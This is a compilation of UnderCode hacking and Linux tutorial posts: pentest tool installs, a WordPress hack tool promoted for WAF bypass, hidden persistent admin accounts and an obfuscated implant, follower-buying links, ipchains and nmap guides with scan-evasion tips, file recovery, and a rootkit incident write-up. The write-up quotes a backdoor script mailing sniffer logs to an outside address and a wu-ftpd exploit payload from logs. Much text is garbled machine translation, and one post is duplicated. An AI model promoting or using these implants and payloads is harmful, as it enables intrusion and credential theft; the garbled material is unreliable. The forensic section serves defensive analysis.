▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑The Latin, this script automatically install any package for pentest with uptodate tools , and lazy command for run the tools like lazynmap , install another and update to new #actually for lazy people hahaha #and Lalin is remake the lazykali with fixed bugs , added new features and uptodate tools . It's compatible with the latest release of Kali
pinterest.com/undercodeOfficial

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) git clone https://github.com/Screetsec/LALIN

2) cd LATIN

3) $ sudo chmod +x Lalin.sh

4) $ sudo ./Lalin.sh

🦑Tested by UnderCode

> kali, on GNOME desk

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Updated 2020 generate and search pattern string for exploit development
twitter.com/unDERCODENews

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) git clone https://github.com/Svenito/exploit-pattern

2) cd exploit-pattern

3) Generate a pattern

$> pattern.py 100
Aa0Aa0Aa1Aa1Aa2Aa2Aa3Aa3Aa4Aa4Aa5Aa5Aa6Aa6Aa7Aa7Aa8Aa8Aa9Aa9Ab0Ab0Ab1Ab1Ab2Ab2Ab3Ab3Ab4Ab4Ab5Ab5Ab6A

4) Search for a pattern
$> pattern.py Bf4B

5) Pattern Bf4 first occurrence at position 942 in pattern.
$> pattern.py 0x42346642
Pattern 0x42346642 first occurrence at position 942 in pattern.

6) Use it in your own python code
After placing pattern.py in the same directory as your script:

from pattern import pattern_gen

print(pattern_gen(10))
or

from pattern import pattern_search

found_at = pattern_search('Bf4B')

@underCodeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 New 2020 wordpress hack script for linux-termux :
T.me/UnderCodeTesting

>Features :

1) Bypass WAF(Web application firewall)

2) Hidden/Stealth

3) Let's you login to any user

4) Dump entire user entries

5) Create a persistent admin account that is hidden

6) Obfuscated implant

7) Multi-functionality

🦑 𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) git clone https://github.com/shadowlabscc/ProjectOpal.git

2)cd ProjectOpal

3) python opal.py

@underCodeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 2020 Popular instagram sites-Trials-Passwords not Required :
THOSE ARE MOST POPULAR BUT NOT TESTED BY UNDERCODE :
fb.com/underCodeTesting

> https://famoid.com/buy-instagram-followers/

> https://www.followerpackages.com/buy-instagram-followers/

> https://www.genuinelikes.com/buy-instagram-followers.php

> https://www.getrealboost.com/buy-real-instagram-followers/

> https://krootez.com/buy-real-instagram-followers/

> https://buyiglikesfast.com/

> https://cheapigfollowers.com/

> https://friendlylikes.com/

> https://brsm.io/buy-real-active-instagram-followers/


🦑 There is also 100000 sites But we choosed most popular services-
🦑If Site Trial not avaible-Try after few hours :)

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Enhance network security with SYN packet characteristics BY uNDERcODE :
twitter.com/UnderCodeNews

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) Consider the following situation: the
internal network is 198.199.1.0, and Linux is used as a router and firewall to connect to the Internet. On the firewall, eth0 is connected to the external network and eth1 is connected to the internal network.

2) For the security of the www service, set the following set of ipchains rules:
ipchains -A input -p tcp -s 198.199.1.0/24: 1024 -d 0.0.0.0/0 www -i eth1 -j ACCEPT

3) ipchains -A input -p tcp -s 0.0.0.0/0 www -d 198.199.1.0/24 1024: -i eth0 -j ACCEPT

4) In the above settings, only internal users are allowed to access www hosts on the Internet with ports above 1024 (undefined ports) In other words, allow a port greater than 1024 on the intranet host and port 80 on the Internet to establish a connection. Imagine that this would allow hosts on the Internet to use port 80 to connect to a port on your intranet host that is greater than 1024. From this we can see that the system has security risks because there are many services with service ports greater than 1024. So, how to overcome this hidden danger, we can use the characteristics of the SYN packet to eliminate this hidden danger.

5) First let's take a look at the flag bits in the TCP data segment header. TCP has six flags, which are: URG, ACK, PSH, RST, SYN, and FIN. Let's focus on the ACK, SYN and FIN flags.

6) ACK: indicates whether the confirmation number is legal, 1 indicates legality, 0 indicates that the confirmation number is invalid. The acknowledgment number refers to the next byte that is expected to be received instead of the previously received byte. It can be seen that the ACK of the packet that initiates the connection establishment request (that is, the first guarantee) is always set to 0, and the subsequent packets are always set to 1.

7) SYN: used to establish a connection. In the connection request, SYN = 1, and in the connection request confirmation, SYN = 1. Therefore, SYN stands for CONNECTION REQUEST and CONNECTION ACCEPTED. In subsequent TCP packets, SYN is always set to zero.
FIN: Used to cancel the connection.

8) The above can be summarized with the following table:

ACK flag SYN flag meaning of the TCP packet
0 1 connection request
1 1 connection request confirmation (accept connection request)
1 0 confirmation connection request confirmation
1 0 data packet
... ...

9) What we call a SYN packet is a connection request packet. As shown above, the SYN packet has the following characteristics: SYN = 1, ACK = 0, FIN = 0. Therefore, in order to filter connection request packets, it is only necessary to filter out SYN packets.

10) In ipchains, we can specify SYN packets like this:
-p tcp -s xxxx / x -y
If we can define all SYN packets from 192.168.1.0 like this:
-p tcp -s 192.168.1.0/24 -y
we can also Prefix -y with! To define all non-SYN packets:
-P tcp -s xxxx / x! -Y

🦑 So, in the above example, we can enhance the security of the network like this:

ipchains -A input -p tcp -s 198.199.1.0/24: 1024 -d 0.0.0.0/0 www -i eth1 -j ACCEPT
ipchains -A input -p tcp! -y -s 0.0.0.0/0 www -d 198.199.1.0/24 1024: -i eth0 -j ACCEPT

This will prevent hosts on the Internet from connecting to hosts on your intranet using port 80 A port greater than 1024, thereby achieving the purpose of enhancing network security.

References:
1) IPCHANIS-HOWTO
2)Internet firewall domain network security
3) Computer network

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Full UnderCdoe Tutorial: Nmap Network Security Scanner Instructions
PART 1

instagram.com/underCodeTestingCompany

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

-i
Read data from the specified file instead of the command line. This file can store a list of hosts or networks, separated by spaces, TAB keys, or newlines. If you want to read from a standard input device (file)-for example, at the end of a pipe character, you need to use a hyphen (-) for the file name. You can find more information on writing this document in the target specifications.

The -p
parameter can specify the port you want to scan. For example, '-p 23' will only detect the port 23 of the host. The default scan is from 1 to 1024, or you can use the nmap A list of ports in the services file.

-F Quick scan mode. Specify that you want to scan only the ports in the port list listed in the services file provided in nmap. This is significantly faster than scanning all 65535 ports.

-D
This is a scan with deceptive mode. All the deceptive addresses you specify will be recorded in the remote host's connection record. In this case, their data storage will show that some port scans are initiated from an IP, but they cannot distinguish which is the real IP and which is used as a cover. This can defeat some of the behavior of tracking through routes, so It is a very practical technique to hide your IP. Separate each spoofed address with a comma. You can freely put 'me' in any place where you want to display the real IP. If you put 'ME' in the sixth place or even last, some port scan recorders (such as Solar Designer's excellent scanlogd) may not show your IP at all, if you don't use 'ME', nmap will place it randomly. Remember that the host you are using to scam must be open or you can scan your target half-open. Because it's fairly easy to tell which real intruder is from a bunch of IP addresses that are actually useless. You may also want to use the IP address instead of the name, so that the host's nameserver logs will not record you. Also remember that some (stupid) \ "port scan probes \" will refuse port scan attempts to the host. In this way, you will inadvertently cause the loss of the connection between the host you scanned and the "phishing host", which may bring a big problem-if the "phishing host" is an online gateway or even its local The machine will be disconnected as well! So you better use this parameter carefully-for moral reasons-it's just a scam, isn't it? This spoofing can be used in the initial ping scan (using ICMP, SYN, ACK or other) and the actual port status scan. It can also be used for remote OS identification (-O). Of course, if you write too many decoy addresses, it is useless, which can only slow down the scanning speed and reduce some accuracy. And some instruction processing systems may filter out your spoofed packets, although most (almost all) do not place any restrictions on spoofed packets.

-S
Under certain circumstances, nmap may not be able to determine your source address-in this case nmap will prompt, then you need to use -S with IP address to label. Another possibility is to trick the target into thinking that someone is scanning it. Imagine that a company finds constant scanning by competitors :), this is an unsupported usage, or rather, not the main purpose. I just use it to remind people not to blame when they find a port scanner. Maybe he is innocent. -e can explain the general usage of this parameter.

-e
tells nmap which interface to send or receive. nmap can detect it automatically, and if it can't, it will prompt you.

PART 2 NMAP FULL

-g
Set the source port number in the scan. Many "naive" firewalls or packet filters, except for the ones they establish that allow DNS (53) or FTP-DATA (20) packets to come in to establish a connection, are generally filtered. Obviously this is a very thoughtless approach, because intruders can Easily edit a source port from FTP or DNS. For example, if you cannot get information from a host's host: port through TCP ISN, then by using the -g command, nmap will change the source port and try again. It should be understood that there may be a small delay in using this option, because I sometimes need to store useful information in the source port number.


-M
sets the maximum number of sockets for parallel TCP connect () scans (default) . This is quite effective for moderately slowing down the scan, it can avoid crashing the remote host. Another way is to use -sS.


Timing options
-------- *

Although nmap is generally able to complete the scanning task as quickly as possible in runtime, there are occasionally some hosts / ports that cannot be detected. This may be The default time strategy of nmap is not consistent with your goal (equivalent to the setting of timeout). Here are some options to control the scanning time:

-T
This is a parameter setting that can be used to conveniently express the priority of the nmap time policy. Paranoid mode scans at extremely slow speeds to avoid recording by digital recording systems. It makes scans continuous rather than concurrent and usually waits at least five minutes before sending a packet. Sneaky is similar, except that it sends a packet every 15 seconds. Polite mode is used to reduce the network load to reduce the possibility of crashes. It continuously sends probes and waits for 0.4 seconds between the two packets. Normal is the normal usage of nmap, and it does its best to scan as fast as possible-unless the host or port connection is lost. In Aggressive mode, a five minute timeout is set for each host, and each probe waits for no more than 1.25 seconds. Insane mode is for adapting to very fast networks or you don't care about losing some information-because it's too fast! Its timeout is set to 75 seconds and it only waits for 0.3 seconds for a response. It allows "sweeping" a fast network system :). You can also use numbers (0-5) to represent parameters, such as' -t 0 'Means Paranoid and' -t 5 'stands for Insane mode. Note that these time settings cannot be combined in the underlying control. (NOT be used in combination with the lower level controls given below.)

--Host_timeout
specifies the total scan time of nmap for a certain IP. If it exceeds, it will not be processed. The default is not set.

--max_rtt_timeout
specifies the maximum time for nmap to respond to a probe from the remote end. The default is 9000.

--initial_rtt_timeout
specifies the timeout time of the initial probe. This is usually effective when scanning hosts protected by a firewall with -P0. nmap will get a good RTT assessment and a few initial probes by pinging. The default value is 6000.

--max_parallelism
Specify the maximum number of parallel scans allowed by nmap. Set to 1 to indicate that nmap scans only one port at a time. It will also affect other scans such as ping sweep, RPC scan, etc.

--scan_delay
specifies the minimum time between two probes that nmap must wait. This is a way to reduce the network load and make scanning less visible under the records of the integrated data store.

Target description
-------- *

All options without parameters will be regarded as the target host description of nmap. The simplest example is just listing a single host name or IP address on the command line. If you want to scan a subnet of an IP address, you can add '/ mask' to the host name and IP address. The mask must be between 0 (scanning the entire network) and 32 (specific single host). Use / 24 to scan for a class C address, and / 16 to scan for a class B address
...

nmap also has some more useful symbolic explanations that let you use list / ranges to specify IP addresses for each element. For example, if you want to scan a class B URL 128.210. *. *, You can use '128.210. *. *' Or '128.210.0-255.0-255' or even '128.210.1-50,51-255.1,2,3 , 4,5-255 '. Of course, you can also use the mask mentioned above: '128.210.0.0/16'. All of these are equivalent. Remember that most shells require delimiters such as quotes when you use '*'.

Another interesting thing is that you can "split" the entire network in other ways. For example, you can use '*. *. 5.6-7' to scan all IP addresses ending in .5.6 or .5.7. For more information, you can look at the example section.

Scanning example
-------- *

Here are some examples of scanning using nmap, from the simplest to the most complex ones. Note that there are real numbers and some real domain names-this makes the scanning behavior more specific. Here you can replace the addresses / names with your own network name. Although the analysis of the results of the port scan may make some people vulnerable, I don't think it is illegal. I have scanned hundreds or thousands of machines but received only one complaint. But I am not a lawyer and some people are annoyed by nmap detection, so it is best to scan or-risk after getting permission, the consequences are at your own risk.

nmap -v target.example.com

scans all reserved TCP ports on target.example.com in this way, -v means use verbose mode.

nmap -sS -O target.example.com/24

This will start a half-open scan of SYN. ​​The target is the class C subnet where target.example.com is located. It also tries to determine what system is running on it. . This requires root privileges because it uses half-open scanning and system detection.

nmap -sX -p 22,53,110,143,4564 128.210. *. 1-127

Send a Xmas tree to scan within half of the subnet where Class B 128.210 is located. We will check whether the system is running sshd, DNS, pop3d, imapd, or port 4564. It should be noted that due to the imperfectness of the Microsoft TCP stack, Xmas scanning will not run successfully on its platform. The same problem may exist in CISCO, IRIX, HP / UX, and BSDI.

nmap -v -p 80 '*. *. 2.3-5'

This is a way to locate a domain (divide the entire network into many small parts) and then scan. All IP addresses ending in .2.3, .2.4, or .2.5 are scanned here. You can also use -sS if you are ROOT. Similarly, you can search for more interesting machines starting from 127. You can replace the preceding asterisk with '127-222'-IMHO, there are a lot of interesting machines in that area.

host -l company.com | cut '-d' -f 4 | ./nmap -v -i-

do a DNS zone transfer to find the host on company.com and send the IP address to nmap (feed the IP addresses to nmap). This command runs under my GNU / Linux platform, you may need to use different option parameters or different operating systems.


Bedbugs-
*
bugs? What's wrong? If you find it, please tell me, the revised version will be more perfect :), remember to give it to me along with the "fingerprints" of the OS, so that I can have enough data to modify ...

Author
---- *

Fyodor

issued
---- * The

latest version of nmap can be obtained from the following URL (the following is the copyright information)

http://www.insecure.org/nmap/

nmap is (C) 1997, 1998, 1999 by Fyodor ( fyodor@dhp.com , fyodor@insecure.org )

libpcap is also distributed along with nmap. It is copy-righted by Van Jacobson, Craig Leres and Steven McCanne, all of the Lawrence Berkeley National Laboratory, University of California, Berkeley, CA. The Version distributed with nmap may be modified, Pristine sources are available fromftp: //ftp.ee.lbl.gov/libpcap.tar.Z.

NMAP 3

This program is free software; you can redistribute it and / or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; Version 2. This guarantees your right to use, modify, and redistribute Nmap under certain conditions. If this license is unacceptable to you, Insecure.Org may be willing to sell alternative licenses (contact fyodor@dhp.com ).

🦑This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details (it is in the COPYING file of the nmap distribution).

It should also be noted that Nmap has been known to crash certain poorly written applications, TCP / IP stacks, and even operating systems. Nmap should never be run against mission critical systems unless you are prepared to suffer downtime. We acknowledge here that Nmap may crash your systems or networks and we disclaim all liability for any damage or problems Nmap could cause.

All versions of Nmap equal to or greater than 2.0 are believed (through informal testing) to be Year 2000 (Y2K) compliant in all respects. That being said, we reiterate that Nmap comes with no warranty. There is no reason to believe versions earlier than 2.0 are susceptible to problems, but we have not tested them.


Attached:

The operating platform of nmap
-------------- *

Portability
NMAP is developed under LINUX, but now it can be used on many platforms Run on. Thanks to Lamont Granquist for his great help in running the NMAP automated console on many platforms I can't access. The following is a brief list of systems that support NAMP:

OS Compiles TCP scan (-sT) SYN scan (-sS) FIN scan (-sF) Frag scan (-f) OS Detection (-O)
Linux Yes! Yes! Yes! Yes! Yes! Yes!
FreeBSD Yes! Yes! Yes! Yes! Yes! Yes!
OpenBSD Yes! Yes! Yes! Yes! Yes! Yes!
NetBSD Yes! Yes! Yes! Yes! Yes! Yes!
Solaris 2.4-7 Yes! Yes! Yes! Yes! No :( Yes!
SunOS 4.1.4 w / gcc Yes! Yes! Yes! Yes! No :( Yes!
IRIX 5.3-6.4 Yes! Yes! Yes! Yes! No: (Yes!
HP / UX 10.20 Yes! Yes! Yes! Yes! Yes! Unknown
BSDI 2.1 and up Yes! Yes! Yes! Yes! Unknown Yes!
AIX (use cc, not gcc) Yes! Yes! No :( No: (No :( No :(
Digital UNIX / Alpha Yes! Yes! POSSIBLE KERNEL PANIC!
Cray UNICOS 10.0 Yes! Yes! No :( No :( No :( No :(

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑NMAP A> Z BY UNDERCODE

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Miscellaneous Tools-Recover Deleted Files in ext2 File System :
twitter.com/UnderCodeNews

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) if you accidentally accidentally deleted an important file, such as rm -rf kkk And kkk is a very important file for you, you must be very painful, at this time you must not panic, you should stop writing any files to your hard disk immediately. It is completely recoverable. (I wrote the following specifically for the ext2 file system, other file systems have methods, I will write later):
#debugfs / dev / hda1 (the partition where the deleted file is located)
debugfs: lsdel
can list your recent The inode table of the deleted file is roughly as follows:

2) Inode Owner Mode Size Blocks Time deleted

3) This is the node table number, owner, file attributes (that is, read, write, etc.), size, block (generally 1block = 1K), when deleted time. With this information, you should be able to quickly determine which file you want to recover. Then use
debugfs: dump <the value of the inode table you want to restore> / home / directory (to that directory)
OK! It's that simple, you can find it in / home / directory.

4) Of course, if you have a lot of files, doing this one by one is definitely troublesome, you can download some tools. I give it here:
http://revocer.sourceforge.net/linux/recover.
Everyone, try it. If you have any difficulties, please send here,

5) During the practice of the brothers, such information appeared, and they did not know how to deal with it. Please enlighten me.
311543 0 100600 7603556 14/14 Wed Oct 2 18:39:21 2002
586046 0 100644 7044 2/2 Wed Oct 2 18:51:50 2002
760593 0 100600 363 1/1 Wed Oct 2 18:53:35 2002
9551 deleted inodes found.
debugfs: dump 311543
dump: Usage: dump_inode [-p] <file> <output_file>
debugfs: dump 311543 / root
311543: File not found by ext2_lookup
debugfs:

6)wants to restore this 311543 because I am in the / root directory I deleted a file, I saw it was 311543, but using the following command to restore, the above prompt appeared

7) You should be like this.

Debugfs: dump <311543> / root / ppp (any file name).
Try again . Did you

succeed?

8) I am now under windows, and my linux is JFS. Recovery is more convenient. Etc. Will I switch to LINUX and build an ext2 system, I have tried it before, and it must be


9) ok . Dude is terrific, serve it, and it will be OK. . . .
Now my brother has a question: I deleted a .tar.gz file, but after the restoration is complete, I cannot use
#tar zxvf * tar.gz to extract it.

10) The other is how to restore the original file name. For example, I deleted wine.tar.gz, but I ca n’t remember what the specific file name is, but I want to restore the original file name, such as I deleted important files in the system, but I don't remember what kind of file name it is, but this file name is extremely important to the system, such as mozilla under / usr / bin. How can I do this? ?

11) The main reason is to know why. The answer is simple. To know the file name, use
debugfs: ls -d.

12) As for the file cannot be used, it is because the dump is a continuous block, and your file may not be a continuous block.
Use debugfs: stat <inode> to see its status, and then dd them down one by one (of course there are tools to save a lot of effort).

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Bluefish web editor based on Linux text mode:
fb.com/UnderCodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) Bluefish advertises itself as "an editor for skilled web designers and programmers", but its UI is very intuitive, and any beginner can quickly get started and discover and continually accumulate Master its other features. If you need a text editor that can design web code, then it will be a very good software. The overall impression it gives me is professional but not intimidating, and the combination of text and icons is good.

2) Bluefish provides many common HTML task options, such as fonts, tables, etc., and of course links. This software uses a less common "anchor" to indicate clickable links. The Link Description dialog box even provides Java script event functions such as OnClick and OnMouseover.

3) It also has other dialogs to create text in PHP and SQL tasks. Like many Apache and C options, you can also group files by project for development. The search and replace function is also very good, it also supports regular expressions, and you can also customize syntax highlighting for multiple languages.

4) Let me talk about some of its shortcomings. If you need some documentation help, then you need to open a separate document, because help is not integrated with this application. Its instructions are very extensive, and if you are patient, you can certainly find what you want. For example, for me, spell checking didn't let me find it quickly, but after I read the instructions, I found that you must install a standalone open source Aspell application to be able to perform spell checking.

5) Macros are operated through a "custom menu", where you can create your own text strings, HTML opening and closing tags, or search and replace commands. The creation of text strings includes some dialog boxes with additional features, which are very simple to use.

6) Somewhat disappointingly, in such an intuitive interface, I didn't find the "Edit" custom menu for the macro I created, but if you refer to the steps on the instructions, everything is clear. Macro functions may not be so powerful compared to some other applications. For example, I cannot find how to use other Bluefish commands in the custom menu, but they are very convenient for repeated input.

7) Finally, Bluefish does not position itself as an application for writing, nor does it have some commands for text manipulation, such as changing capital letters or merging or splitting lines.

8) That said, if you are looking for a moderately functional text-based web code editing application, Bluefish is definitely worth a try.

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Make Incremental Backups linux :
T.me/underCodeTesting

1) The first step in creating an incremental backup is to generate a list of files that have changed in the past This is usually achieved by the find command.

2) For example to generate a list of files that have changed in the last 24 hours use:
　find / -mtime -1! -Type d -print> /tmp/filelist.daily

3) where the -mtime -1 option will make find change the past 24 hours to find out through the archives; -type d will find files from the list!
remove the name of the directory to find all files similar changes in the past week off with:.

>　find / -mtime -7 -print> / tmp /filelist.weekly

　4) 　when generating a list of files to be backed up, put a file in the list, use the tar -T option to specify a file that contains
a list of files to be backed up. for example listed in the file / tmp / filelist Back up all files in .daily to device / dev / fd0, use:

> 　tar -cv -T /tmp/filelist.daily -f / dev / fd0

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Make Incremental Backups linux :
T.me/underCodeTesting

1) The first step in creating an incremental backup is to generate a list of files that have changed in the past This is usually achieved by the find command.

2) For example to generate a list of files that have changed in the last 24 hours use:
　find / -mtime -1! -Type d -print> /tmp/filelist.daily

3) where the -mtime -1 option will make find change the past 24 hours to find out through the archives; -type d will find files from the list!
remove the name of the directory to find all files similar changes in the past week off with:.

>　find / -mtime -7 -print> / tmp /filelist.weekly

　4) 　when generating a list of files to be backed up, put a file in the list, use the tar -T option to specify a file that contains
a list of files to be backed up. for example listed in the file / tmp / filelist Back up all files in .daily to device / dev / fd0, use:

> 　tar -cv -T /tmp/filelist.daily -f / dev / fd0

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Tracking a hack full tutorial by undercode :
t.me/undercodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) I check my machine, the unexpected discovery was hacked
actually my own mistakes, not patched wuftpd26, but also Without changing / etc / ftpusers,
people can easily use wuftpd26's remote vulnerability to enter my machine with anonymous users. However, this friend apparently used the rootkit without consideration

🦑 As a result, the output of ps is as follows:
[root @ ns] # ps
PID TTY STAT TIME COMMAND
678 1 S 0:00 / sbin / mingetty tty1
679 2 S 0: 00 / sbin / mingetty tty2
680 3 S 0:00 / sbin / mingetty tty3
681 4 S 0:00 / sbin / mingetty tty4
682 5 S 0:00 / sbin / mingetty tty5
683 6 S 0:00 / sbin / mingetty tty6
5557? S 0:00 / bin / sh -i
5591? R 0:00 ps

🦑 I think anyone knows what it means. So let's take a step by step to see what he did
[this hack did not expect that this machine already has an owner, and installed its own rootkit toolkit]

1) [root @ ns] # strings / bin / login | more
..........
__bss_start
_end
PPRV
DISPLAY
/ bin / envpc
l4m3r0x
/ bin / sh

2) From the above, it can be seen that it is a login backdoor, through export PATH = \ After "l4m3r0x \", you can directly telnet each other to get #
[root @ ns] # strings / bin / ls | more
.....
always
/ usr / local / share / locale
fileutils
GNU fileutils-3.13
vdir
% s-% s
/dev/sgk/.fsdc/.1file
// DIRED //
// SUBDIRED //
POSIXLY_CORRECT
COLUMNS

3) Note that /dev/sgk/.fsdc/.1file is where his rootkit file is located, so let's See what's there
[root @ ns] # mv /dev/sgk/.fsdc/.1file / tmp
[root @ ns] # ls -la /dev/sgk/.fsdc
total 641
drwxr-xr-x 5 root ftp 1024 Feb 4 09:01 .
drwxr-xr-x 3 root ftp 1024 Feb 2 17:11 ..
-rw-r--r-- 1 root ftp 7 Feb 2 17:11 .1logz
-rw-r--r-- 1 root ftp 88 Feb 2 17:11 .1proc
drwxr-xr-x 2 root ftp 1024 Feb 2 17:11 backup
drwxrwxr-x 2undercode 1024 Feb 2 17:14 clean
-rwxr-xr-x 1 undercode 5578 Nov 18 11:08 filetrans
-rwxr-xr-x 1 undercode 9396 Aug 23 killall-real
-rwxr-xr-x 1 undrecode 7578 Aug 21 17:22 parse
-rwxr-xr-x 1 undercode 6232 Sep 9 parse1
drwxrwxr-x 2 undercode 1024 Jan 28 16:34 patches
XR-X. 1--rwxr undercode 28004 Real-Aug-PS 23 is
-rwxr XR-580 696-X. 1 undercode On Feb 2000 SSH 18 is
-rw-R & lt - r--. 1 the root FTP 1398 System On Feb. 4 08:55

4) Oh It seems that there are quite a lot of things. From ftp, we can know that he is using the ftP vulnerability. From lujiang, he also stole a local user
[root @ ns .fsdc] # cat .1logz
rshd
[root @ ns .fsdc] # cat .1proc
3 nscd
2 nmap
2 lscan
2 login
2 lpset
2 xtty
2 nscd
3 statd
3 lpq
3 scan
3 sniff
3 envpc
[root @ ns .fsdc] # cat /tmp/.1file
sgk
.fsdc
.clib
.1proc
.1addr
.1file
.1logz
envpc
xtty
pttys
filetrans
lpset
libload
system
parse

5) Logz is called by syslogd, which hides the records generated by the listed commands.
.1proc is called by the ps command. Hides the listed process names
. Listed file names,
[root @ ns .fsdc] # cd patches
[root @ ns patches] # cat patch.sh
#! / Bin / sh
echo \ "[1] Patching WU-FTPd ... \"
rpm -Uhv wuftpd.rpm
echo \ "[2] Patching NFS-utils ... \"
rpm -Fvh nfs-utils.rpm
ps aux >> / tmp / psaux
if [\ " cat / tmp / psaux | grep rpc. statd \ "]; then
echo \" [3] Restarting the rpc.statd daemon (NFS-utils) \ "
/etc/rc.d/init.d/nfslock restart
else
echo \ "[4] The daemon rpc.statd isn \ t running, so no need to restart! \"
fi
rm / tmp / psaux

6) This is a patch package for the wuftpd and rpc.statd vulnerabilities. ]
other file directory I did not carefully read [these will provide the download package]
according to the list of hidden files .1file us one find these documents.
[root @ ns .fsdc] # strings / usr / bin / xtty
. .....
PPRV
(nfsiod)
socket
bind
listen
accept
/ bin / sh

7) It is not difficult to see that it is a backdoor
[root @ ns .fsdc] # strings / dev / pttys
#! / Bin / sh
cat /dev/sgk/.fsdc/ system | mail prosupp@usa.net > / dev / null 2> & 1
nohup / usr / lib / lpset> / dev / null &
nohup / usr / bin / xtty> / dev / null &
rm -rf nohup.out
this The hack is very smart, and you can send sniffing records to this scriptprosupp@usa.net [/dev/sgk/.fsdc/system是个嗅探记录]
[root@ns .fsdc]# cat /etc/rc.d/rc.sysinit|more
..........
if [ \"$PROMPT\" != \"no\" ]; then
/sbin/getkey i && touch /var/run/confirm
fi
wait
# Name Server Cache Daemon..
/usr/sbin/nscd -q
# Name Server Cache Daemon..
/usr/sbin/nscd -q
# Kernel module checker
/usr/lib/libload > /dev/null 2>&1
[root@ns bak]# strings /usr/sbin/nscd|more
+Q$9
/usr/info/.clib/sshd_config
Received SIGHUP; restarting.
RESTART FAILED: av[0]=\%.100s\, error: %.100s.
Received signal %d; terminating.
Timeout before authentication.
Generating new% d bit RSA key.
RSA key generation complete.
F: p: b: k: h: g: diqV:
i686-unknown-linux
1.2.27
sshd version% s [% s]
Usage:% s [options]
Options:
/usr/info/.clib stores an ssh backdoor, so that the machine will open a convenient door for
hacking after startup. [Root @ ns .fsdc] # strings / sbin / syslogd
=========== =======================================================
Time:% s Size:% d
Path:% s
=>% s [% d]
------------------------------ ------------------------------
Exiting ...
cant get SOCK_PACKET socket
cant get flags
cant set promiscuous mode
/ dev / null
eth0
system
cant open log

🦑 This hack changed the syslogd file into a sniffer

. . . . . . . . . .
The next step is to restore the system and modify the stolen account password. This is not a complaint here. From my sniffing records, I know that he came from these two machines.

[Root @ ns man] # more system2
================ =================================================
Time: Fri Feb 2 17:26:07 Size: 1056
Path: 210.217.237.75 => ns.xxx.cn [21]
--------------------------- ---------------------------------
## g #> 4h #> 4hUSER ftp
#> hPASS 111F11CA? k ^ 11 ^ Ff \ 1 ^ = 11 ^ C11 ^ u1F ^ = 0F1FvFNV110bin0sh1..11
#> h <#? Hsite exec xx (%. F% .f% .f% .f% .f% .f% .f%. f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f
% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f % .f% .f% .f
% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f%. f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f%
.f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f % .f% .f% .f% .f% .f% .f% .f% .f
